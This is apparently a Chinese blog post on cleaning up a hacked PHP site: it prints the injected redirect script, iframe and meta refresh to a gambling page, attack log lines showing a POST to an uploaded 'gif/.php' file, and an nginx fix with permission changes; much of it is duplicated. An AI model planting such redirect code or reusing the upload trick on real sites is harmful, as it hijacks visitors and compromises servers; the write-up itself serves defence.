被注入木馬的漏洞,修復過程
1.文件被注入的內容:
'<script>{
window.location.href="http://www.22hy.com/html/livedealer.html?pid=1"
}</script>
<iframe src="http://www.22hy.com/html/livedealer.html?pid=1" align=center width="1440"
height="6500" ></iframe>
<meta http-equiv="refresh" content="0.1;URL=http://www.18hy.com/html/livedealer.html?pid=1">'
2.查看被修改文件的時間
[roots]$ stat index.php.bad
File: "index.php.bad"
Size: 648 Blocks: 8 IO Block: 4096 普通文件
Device: fd00h/64768d Inode: 6553641 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 502/ www) Gid: ( 0/ root)
Access: 2013-12-02 15:12:34.167243911 +0800
Modify: 2013-11-25 11:20:32.659258572 +0800
Change: 2013-11-29 18:24:29.209265041 +0800
3.查看服務器(linux)日誌
192.168.11.10 - - [25/Nov/2013:14:40:18 +0800] "POST /uc_server/data/tmp/upload30540323.gif/.php HTTP/1.0" 200 14 "http://bbs.navidog.cn" "Mozilla/5.0 (compatible; Baiduspider/2.0; +spider)"
192.168.11.10 - - [25/Nov/2013:14:40:18 +0800] "POST /uc_server/data/tmp/upload30540323.gif/.php HTTP/1.0" 200 381 "http://bbs.navidog.cn" "Mozilla/5.0 (compatible; Baiduspider/2.0; +spider)"
4.根據日誌屏蔽漏洞
location ~ ^(.+\.php)(.*)$
{
if ($request_filename ~* (.*)\.php) {
set $php_url $1;
}
if (!-e $php_url.php) {
return 403;
}
fastcgi_pass unix:/tmp/php-cgi.sock;
fastcgi_index index.php;
fastcgi_split_path_info ^(.+\.php)(.*)$;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
include fastcgi.conf;
}
5.修改服務器文件的權限:緩存有寫的權限,php文件只有讀和執行權限
'<script>{
window.location.href="http://www.22hy.com/html/livedealer.html?pid=1"
}</script>
<iframe src="http://www.22hy.com/html/livedealer.html?pid=1" align=center width="1440"
height="6500" ></iframe>
<meta http-equiv="refresh" content="0.1;URL=http://www.18hy.com/html/livedealer.html?pid=1">'
2.查看被修改文件的時間
[roots]$ stat index.php.bad
File: "index.php.bad"
Size: 648 Blocks: 8 IO Block: 4096 普通文件
Device: fd00h/64768d Inode: 6553641 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 502/ www) Gid: ( 0/ root)
Access: 2013-12-02 15:12:34.167243911 +0800
Modify: 2013-11-25 11:20:32.659258572 +0800
Change: 2013-11-29 18:24:29.209265041 +0800
3.查看服務器(linux)日誌
192.168.11.10 - - [25/Nov/2013:14:40:18 +0800] "POST /uc_server/data/tmp/upload30540323.gif/.php HTTP/1.0" 200 14 "http://bbs.navidog.cn" "Mozilla/5.0 (compatible; Baiduspider/2.0; +spider)"
192.168.11.10 - - [25/Nov/2013:14:40:18 +0800] "POST /uc_server/data/tmp/upload30540323.gif/.php HTTP/1.0" 200 381 "http://bbs.navidog.cn" "Mozilla/5.0 (compatible; Baiduspider/2.0; +spider)"
4.根據日誌屏蔽漏洞
location ~ ^(.+\.php)(.*)$
{
if ($request_filename ~* (.*)\.php) {
set $php_url $1;
}
if (!-e $php_url.php) {
return 403;
}
fastcgi_pass unix:/tmp/php-cgi.sock;
fastcgi_index index.php;
fastcgi_split_path_info ^(.+\.php)(.*)$;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;
include fastcgi.conf;
}
5.修改服務器文件的權限:緩存有寫的權限,php文件只有讀和執行權限
6.更改用戶,啓動nginx的用戶是root,nginx的子線程訪問用戶是www,目錄權限的全部者是other php
參考網站: html
http://zhumeng8337797.blog.163.com/blog/static/1007689142011815642384/ node
相關文章
- 1. 網站木馬修復網站漏洞修復方案
- 2. 記一次mysql注入漏洞修復
- 3. 怎麼修復網站漏洞之metinfo遠程SQL注入漏洞修補
- 4. 網站漏洞修復之metinfo SQL注入漏洞
- 5. 織夢dedecms漏洞修復大全注入漏洞
- 6. 網站漏洞修復 被上傳webshell漏洞修補
- 7. Nginx修復漏洞打補丁過程
- 8. 漏洞復現:使用Kali製做木馬程序
- 9. 漏洞復現:使用Kali製作木馬程序
- 10. Android安全漏洞修復-Webview中的漏洞修復
- 更多相關文章...
- • SQLite 注入 - SQLite教程
- • Spring DI(依賴注入)的實現方式:屬性注入和構造注入 - Spring教程
- • YAML 入門教程
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
歡迎關注本站公眾號,獲取更多信息
